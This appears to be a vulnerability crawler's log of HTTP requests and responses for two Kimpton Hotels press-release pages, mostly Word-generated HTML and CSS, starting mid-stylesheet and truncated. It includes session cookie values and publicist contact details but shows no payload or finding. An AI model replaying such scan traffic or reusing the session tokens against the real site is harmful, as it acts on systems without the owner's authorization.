mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l2 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l4:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:"Courier New";}@list l6 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Arial;}@list l6:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l7:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l10 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l11 {mso-list-id:1765494741; mso-list-type:hybrid; mso-list-template-ids:-1093994450 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l11:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-hansi-font-family:Calibri;}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="su..
- /pdfs/press/html/Eventi-0210/

/pdfs/press/html/Eventi-0210/

http://www.kimptonhotels.com/pdfs/press/html/Eventi-0210/

Request

GET /pdfs/press/html/Eventi-0210/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Eventi-0210/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30469
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=windows-1252"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author>colleenm</o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>1</o:TotalTime> <o:LastPrinted>2010-03-04T00:43:00Z</o:LastPrinted> <o:Created>2010-03-04T00:44:00Z</o:Created> <o:LastSaved>2010-03-04T00:44:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>1007</o:Words> <o:Characters>5744</o:Characters> <o:Lines>47</o:Lines> <o:Paragraphs>11</o:Paragraphs> <o:CharactersWithSpaces>7054</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:CustomDocumentProperties> <o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle> </o:CustomDocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables/> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:DontGrowAutofit/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:SimSun; panose-1:0 0 0 0 0 0 0 0 0 0; mso-font-alt:\00CB\00CE\00CC\00E5; mso-font-charset:134; mso-generic-font-family:auto; mso-font-format:other; mso-font-pitch:variable; mso-font-signature:16777216 3592 268435456 0 1024 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:windowtext;}h1 {mso-style-next:Normal; margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:1; layout-grid-mode:char; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:SimSun; color:windowtext; mso-font-kerning:0pt; mso-fareast-language:ZH-CN; font-weight:bold; mso-bidi-font-weight:normal;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:windowtext;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:windowtext;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:windowtext;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p {mso-margin-top-alt:auto; margin-right:0in; margin-bottom:12.0pt; margin-left:0in; mso-line-height-alt:11.25pt; mso-pagination:widow-orphan; font-size:13.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:#444444;}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:windowtext; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Tahoma; color:windowtext;}p.Char1, li.Char1, div.Char1 {mso-style-name:" Char1"; mso-style-noshow:yes; margin-top:0in; margin-right:0in; margin-bottom:8.0pt; margin-left:0in; text-align:justify; line-height:12.0pt; mso-line-height-rule:exactly; mso-pagination:none; mso-layout-grid-align:none; font-size:10.0pt; font-family:Verdana; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Verdana; color:windowtext;}span.apple-style-span {mso-style-name:apple-style-span;}p.Default, li.Default, div.Default {mso-style-name:Default; mso-style-parent:""; margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:none; mso-layout-grid-align:none; text-autospace:none; font-size:12.0pt; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Arial; color:black;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:45.0pt .9in .8in .9in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:40987380; mso-list-type:hybrid; mso-list-template-ids:1617186278 180654248 197641 328713 66569 197641 328713 66569 197641 328713;}@list l0:level1 {mso-level-start-at:0; mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:49.5pt; mso-level-number-position:left; margin-left:49.5pt; text-indent:-31.5pt; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Wingdings;}@list l1 {mso-list-id:62340374; mso-list-type:hybrid; mso-list-template-ids:-484679500 491012386 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l1:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Wingdings;}@list l1:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2 {mso-list-id:75329703; mso-list-type:hybrid; mso-list-template-ids:842294488 -25535006 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-start-at:0; mso-level-number-format:bullet; mso-level-text:\F0D8; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}@list l3 {mso-list-id:198445242; mso-list-type:hybrid; mso-list-template-ids:-653597426 328713 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l4 {mso-list-id:578759532; mso-list-type:hybrid; mso-list-template-ids:1908186806 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; font-family:Symbol;}@list l5 {mso-list-id:1649477657; mso-list-type:hybrid; mso-list-template-ids:-1886230016 328713 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l6 {mso-list-id:1707755852; mso-list-type:hybrid; mso-list-template-ids:1565451938 328713 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l6:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Wingdings;}@list l6:level3 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l6:level4 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l6:level5 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Wingdings;}@list l6:level6 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l7 {mso-list-id:2115246097; mso-list-type:hybrid; mso-list-template-ids:-217268626 328713 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.75in; mso-level-number-position:left; margin-left:.75in; text-indent:-.25in; font-family:Wingdings;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman";}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><h1><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1027" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images/image002.gif" v:shapes="_x0000_i1027"><![endif]></span><spanstyle='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-weight:bold'><o:p></o:p></span></h1><p class=MsoNormal><span style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><h1 style='text-align:justify'><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;font-weight:normal;mso-bidi-font-weight:bold'>Media Contacts:<spanstyle='mso-tab-count:1'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span><o:p></o:p></span></i></h1><h1 style='text-align:justify'><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-weight:bold'><o:p>&nbsp;</o:p></span></i></h1><h1 style='text-align:justify'><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-weight:bold'>M. Silver Associates<o:p></o:p></span></i></h1><p class=MsoNormal style='text-align:justify'><i style='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-fareast-language:ZH-CN'>Maria Ronan / 212-754-6500 ext. 230 / </span></i><spanlang=FR style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-ansi-language:FR;mso-fareast-language:ZH-CN;mso-ansi-font-style:italic'><ahref="mailto:maria@msilver-pr.com"><i style='mso-bidi-font-style:normal'><spanlang=EN-US style='mso-ansi-language:EN-US'>maria@msilver-pr.com</span></i></a></span><istyle='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-fareast-language:ZH-CN'> <o:p></o:p></span></i></p><p class=MsoNormal style='text-align:justify'><i style='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-fareast-language:ZH-CN'>Aik Wye Ng / 212-754-6500 ext. 260 / </span></i><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-fareast-language:ZH-CN;mso-ansi-font-style:italic'><ahref="mailto:aikwye@msilver-pr.com"><i style='mso-bidi-font-style:normal'>aikwye@msilver-pr.com</i></a><istyle='mso-bidi-font-style:normal'><span style="mso-spacerun: yes">&nbsp;</span><o:p></o:p></i></span></p><p class=MsoNormal style='text-align:justify'><b style='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></i></b></p><p class=MsoNormal style='text-align:justify'><b style='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Kimpton Hotels<o:p></o:p></span></i></b></p><p class=MsoNormal style='text-align:justify'><i style='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Stacey Ellis / 415-955-5492 / </span><..
- /pdfs/press/html/CNT-Worlds-Best-1109/

/pdfs/press/html/CNT-Worlds-Best-1109/

http://www.kimptonhotels.com/pdfs/press/html/CNT-Worlds-Best-1109/

Request

GET /pdfs/press/html/CNT-Worlds-Best-1109/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/CNT-Worlds-Best-1109/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 21135
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author>Marliese Engel</o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>0</o:TotalTime> <o:LastPrinted>2009-10-29T01:15:00Z</o:LastPrinted> <o:Created>2009-11-30T18:29:00Z</o:Created> <o:LastSaved>2009-11-30T18:29:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>598</o:Words> <o:Characters>3412</o:Characters> <o:Company>Baltz &amp; Company</o:Company> <o:Lines>28</o:Lines> <o:Paragraphs>6</o:Paragraphs> <o:CharactersWithSpaces>4190</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables/> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:DontGrowAutofit/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; 